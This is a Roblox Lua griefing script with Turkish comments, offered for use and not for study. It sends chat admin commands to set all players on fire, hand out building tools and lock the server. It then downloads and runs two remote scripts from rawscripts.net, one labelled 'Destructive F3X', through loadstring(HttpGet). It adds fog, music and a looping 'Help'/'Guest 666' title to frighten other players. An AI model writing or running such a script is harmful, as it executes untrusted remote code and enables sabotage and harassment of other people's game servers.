local TCS = game:GetService("TextChatService") -- Kanalın yüklendiğinden emin olalım local channel = TCS:WaitForChild("TextChannels"):FindFirstChild("RBXGeneral") -- Komut gönderme fonksiyonu local function send(msg) if channel then channel:SendAsync(msg) end end -- --- 1. ADIM: GİRİŞ VE DÖNÜŞÜM --- task.wait(1) send(";hint He is HEre...!?") task.wait(2) send(";char me Guest666_FOUNDYOU666") task.wait(2) send(";time 1") task.wait(1) send(";fire all") task.wait(1) send(";titler me Guest 666") task.wait(4) send(";btools") task.wait(5) send(";serverlock Owner") task.wait(2) -- --- 2. ADIM: DIŞ SCRIPTLERİ YÜKLEME --- -- İlk Script (Universy GUI) task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Universy-GUI-F3x-Leaked-111111"))() end) end) -- İkinci Script (Destructive F3X) task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-z000rzkidd-F3X-GUI-Destructive-111569"))() end) end) -- --- 3. ADIM: ATMOSFER --- task.wait(2) send(";fog") task.wait(1) send(";fogcolor black") task.wait(2) send(";music 139488665764275") -- --- 4. ADIM: 7 SANİYELİK TITLE DÖNGÜSÜ --- task.spawn(function() while true do send(";titler me Help") task.wait(0.5) send(";titler me Guest 666") task.wait(15) -- İstediğin gibi 7 saniye bekleme end end)